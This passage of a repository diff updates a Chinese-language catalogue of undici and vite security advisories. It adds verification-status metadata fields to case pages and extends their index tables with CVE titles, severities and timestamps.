| Undici has CRLF Injection in undici via `upgrade` option | `low` | `generated` | `official` | `2026-03-13T20:54:25.572106Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-1527.md) |
| Undici has Unbounded Memory Consumption in its DeduplicationHandler via Response Buffering that leads to DoS | `low` | `generated` | `official` | `2026-03-13T20:54:25.417862Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-2581.md) |
| Undici: Malicious WebSocket 64-bit length overflows parser and crashes the client | `low` | `generated` | `official` | `2026-03-14T09:17:45.838435Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-1528.md) |
| Undici has an HTTP Request/Response Smuggling issue | `low` | `generated` | `official` | `2026-03-14T09:19:54.772219Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-1525.md) |
| Undici has an unbounded decompression chain in HTTP responses on Node.js Fetch API via Content-Encoding leads to resource exhaustion | `low` | `generated` | `official` | `2026-02-04T02:56:17.456091Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-22036.md) |
| undici Denial of Service attack via bad certificate data | `low` | `generated` | `official` | `2026-02-06T22:08:08.311705Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2025-47279.md) |
| Use of Insufficiently Random Values in undici | `low` | `generated` | `official` | `2026-02-04T02:29:26.373390Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2025-22150.md) |
| Undici's fetch with integrity option is too lax when algorithm is specified but hash value is in incorrect | `low` | `generated` | `official` | `2025-11-04T19:44:42Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2024-30261.md) |
| Undici's Proxy-Authorization header not cleared on cross-origin redirect for dispatch, request, stream, pipeline | `low` | `generated` | `official` | `2025-11-04T19:44:28Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2024-30260.md) |
| Undici's cookie header not cleared on cross-origin redirect in fetch | `low` | `generated` | `official` | `2026-02-04T02:35:56.289390Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2023-45143.md) |
| undici before v5.8.0 vulnerable to uncleared cookies on cross-host / cross-origin redirect | `low` | `generated` | `official` | `2026-02-04T03:02:08.652391Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2022-31151.md) |
| ProxyAgent vulnerable to MITM | `low` | `generated` | `official` | `2026-03-13T22:15:23.541247Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2022-32210.md) |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| Undici has Unbounded Memory Consumption in WebSocket permessage-deflate Decompression | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T20:54:25.563997Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-1526.md) |
| Undici has Unhandled Exception in WebSocket Client Due to Invalid server_max_window_bits Validation | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T20:54:26.149214Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-2229.md) |
| Undici has CRLF Injection in undici via `upgrade` option | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T20:54:25.572106Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-1527.md) |
| Undici has Unbounded Memory Consumption in its DeduplicationHandler via Response Buffering that leads to DoS | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T20:54:25.417862Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-2581.md) |
| Undici: Malicious WebSocket 64-bit length overflows parser and crashes the client | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-14T09:17:45.838435Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-1528.md) |
| Undici has an HTTP Request/Response Smuggling issue | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-14T09:19:54.772219Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-1525.md) |
| Undici has an unbounded decompression chain in HTTP responses on Node.js Fetch API via Content-Encoding leads to resource exhaustion | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T02:56:17.456091Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-22036.md) |
| undici Denial of Service attack via bad certificate data | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-06T22:08:08.311705Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2025-47279.md) |
| Use of Insufficiently Random Values in undici | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T02:29:26.373390Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2025-22150.md) |
| Undici's fetch with integrity option is too lax when algorithm is specified but hash value is in incorrect | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2025-11-04T19:44:42Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2024-30261.md) |
| Undici's Proxy-Authorization header not cleared on cross-origin redirect for dispatch, request, stream, pipeline | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2025-11-04T19:44:28Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2024-30260.md) |
| Undici's cookie header not cleared on cross-origin redirect in fetch | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T02:35:56.289390Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2023-45143.md) |
| undici before v5.8.0 vulnerable to uncleared cookies on cross-host / cross-origin redirect | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:02:08.652391Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2022-31151.md) |
| ProxyAgent vulnerable to MITM | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T22:15:23.541247Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2022-32210.md) |

13
07-framework-security/frameworks/undici/cases/undici-cve-2022-31151.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-04T03:02:08.652391Z"
severity: "low"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -32,6 +36,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-q768-
# undici before v5.8.0 vulnerable to uncleared cookies on cross-host / cross-origin redirect
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `undici--CVE-2022-31151`

13
07-framework-security/frameworks/undici/cases/undici-cve-2022-32210.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-03-13T22:15:23.541247Z"
severity: "low"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -30,6 +34,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-pgw7-
# ProxyAgent vulnerable to MITM
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `undici--CVE-2022-32210`

13
07-framework-security/frameworks/undici/cases/undici-cve-2023-45143.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-04T02:35:56.289390Z"
severity: "low"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -31,6 +35,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-q768-
# Undici's cookie header not cleared on cross-origin redirect in fetch
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `undici--CVE-2023-45143`

13
07-framework-security/frameworks/undici/cases/undici-cve-2024-30260.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2025-11-04T19:44:28Z"
severity: "low"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -32,6 +36,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-m4v8-
# Undici's Proxy-Authorization header not cleared on cross-origin redirect for dispatch, request, stream, pipeline
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `undici--CVE-2024-30260`

13
07-framework-security/frameworks/undici/cases/undici-cve-2024-30261.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2025-11-04T19:44:42Z"
severity: "low"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -32,6 +36,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-9qxr-
# Undici's fetch with integrity option is too lax when algorithm is specified but hash value is in incorrect
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `undici--CVE-2024-30261`

13
07-framework-security/frameworks/undici/cases/undici-cve-2025-22150.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-04T02:29:26.373390Z"
severity: "low"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -34,6 +38,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-c76h-
# Use of Insufficiently Random Values in undici
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `undici--CVE-2025-22150`

13
07-framework-security/frameworks/undici/cases/undici-cve-2025-47279.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-06T22:08:08.311705Z"
severity: "low"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -34,6 +38,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-cxrh-
# undici Denial of Service attack via bad certificate data
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `undici--CVE-2025-47279`

13
07-framework-security/frameworks/undici/cases/undici-cve-2026-1525.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-03-14T09:19:54.772219Z"
severity: "low"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -33,6 +37,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-2mjp-
# Undici has an HTTP Request/Response Smuggling issue
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `undici--CVE-2026-1525`

13
07-framework-security/frameworks/undici/cases/undici-cve-2026-1526.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-03-13T20:54:25.563997Z"
severity: "low"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -33,6 +37,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-vrm6-
# Undici has Unbounded Memory Consumption in WebSocket permessage-deflate Decompression
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `undici--CVE-2026-1526`

13
07-framework-security/frameworks/undici/cases/undici-cve-2026-1527.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-03-13T20:54:25.572106Z"
severity: "low"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -32,6 +36,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-4992-
# Undici has CRLF Injection in undici via `upgrade` option
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `undici--CVE-2026-1527`

13
07-framework-security/frameworks/undici/cases/undici-cve-2026-1528.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-03-14T09:17:45.838435Z"
severity: "low"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -32,6 +36,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-f269-
# Undici: Malicious WebSocket 64-bit length overflows parser and crashes the client
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `undici--CVE-2026-1528`

13
07-framework-security/frameworks/undici/cases/undici-cve-2026-22036.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-02-04T02:56:17.456091Z"
severity: "low"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -32,6 +36,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-g9mf-
# Undici has an unbounded decompression chain in HTTP responses on Node.js Fetch API via Content-Encoding leads to resource exhaustion
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `undici--CVE-2026-22036`

13
07-framework-security/frameworks/undici/cases/undici-cve-2026-2229.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-03-13T20:54:26.149214Z"
severity: "low"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -33,6 +37,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-v9p9-
# Undici has Unhandled Exception in WebSocket Client Due to Invalid server_max_window_bits Validation
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `undici--CVE-2026-2229`

13
07-framework-security/frameworks/undici/cases/undici-cve-2026-2581.md
查看文件

@@ -8,6 +8,10 @@ updated_date: "2026-03-13T20:54:25.417862Z"
severity: "low"
exploit_status: "unknown"
source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types:
- "lab-local"
- "lab-public"
@@ -30,6 +34,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-phc3-
# Undici has Unbounded Memory Consumption in its DeduplicationHandler via Response Buffering that leads to DoS
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层
- Canonical ID: `undici--CVE-2026-2581`

34
07-framework-security/frameworks/vite/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `12`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `12`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `12`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束
@@ -26,17 +30,17 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| vite allows server.fs.deny bypass via backslash on Windows | `medium` | `generated` | `official` | `2026-02-04T04:13:38.886554Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-62522.md) |
| Vite middleware may serve files starting with the same name with the public directory | `medium` | `generated` | `official` | `2026-02-04T04:33:22.508417Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-58751.md) |
| Vite's `server.fs` settings were not applied to HTML files | `medium` | `generated` | `official` | `2026-02-04T04:35:16.287471Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-58752.md) |
| Vite's server.fs.deny bypassed with /. for files under project root | `medium` | `generated` | `official` | `2026-02-04T03:27:17.681639Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-46565.md) |
| Vite has an `server.fs.deny` bypass with an invalid `request-target` | `medium` | `generated` | `official` | `2026-02-04T04:11:44.900383Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-32395.md) |
| Vite allows server.fs.deny to be bypassed with .svg or relative paths | `low` | `generated` | `official` | `2026-02-04T03:51:38.412061Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-31486.md) |
| Vite has a `server.fs.deny` bypassed for `inline` and `raw` with `?import` query | `low` | `generated` | `official` | `2026-02-04T04:37:24.129476Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-31125.md) |
| Vite bypasses server.fs.deny when using ?raw?? | `low` | `generated` | `official` | `2026-02-04T03:13:24.371631Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-30208.md) |
| Websites were able to send any requests to the development server and read the response in vite | `low` | `generated` | `official` | `2026-02-04T04:37:03.076966Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-24010.md) |
| Vite DOM Clobbering gadget found in vite bundled scripts that leads to XSS | `low` | `generated` | `official` | `2026-02-04T04:04:22.977459Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2024-45812.md) |
| Vite's `server.fs.deny` is bypassed when using `?import&raw` | `low` | `generated` | `official` | `2026-02-04T04:05:31.919291Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2024-45811.md) |
| Vite dev server option `server.fs.deny` can be bypassed when hosted on case-insensitive filesystem | `low` | `generated` | `official` | `2026-02-04T04:17:01.410592Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2024-23331.md) |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| vite allows server.fs.deny bypass via backslash on Windows | `medium` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:13:38.886554Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-62522.md) |
| Vite middleware may serve files starting with the same name with the public directory | `medium` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:33:22.508417Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-58751.md) |
| Vite's `server.fs` settings were not applied to HTML files | `medium` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:35:16.287471Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-58752.md) |
| Vite's server.fs.deny bypassed with /. for files under project root | `medium` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:27:17.681639Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-46565.md) |
| Vite has an `server.fs.deny` bypass with an invalid `request-target` | `medium` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:11:44.900383Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-32395.md) |
| Vite allows server.fs.deny to be bypassed with .svg or relative paths | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:51:38.412061Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-31486.md) |
| Vite has a `server.fs.deny` bypassed for `inline` and `raw` with `?import` query | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:37:24.129476Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-31125.md) |
| Vite bypasses server.fs.deny when using ?raw?? | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:13:24.371631Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-30208.md) |
| Websites were able to send any requests to the development server and read the response in vite | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:37:03.076966Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-24010.md) |
| Vite DOM Clobbering gadget found in vite bundled scripts that leads to XSS | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:04:22.977459Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2024-45812.md) |
| Vite's `server.fs.deny` is bypassed when using `?import&raw` | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:05:31.919291Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2024-45811.md) |
| Vite dev server option `server.fs.deny` can be bypassed when hosted on case-insensitive filesystem | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:17:01.410592Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2024-23331.md) |

某些文件未显示,因为此 diff 中更改的文件太多 显示更多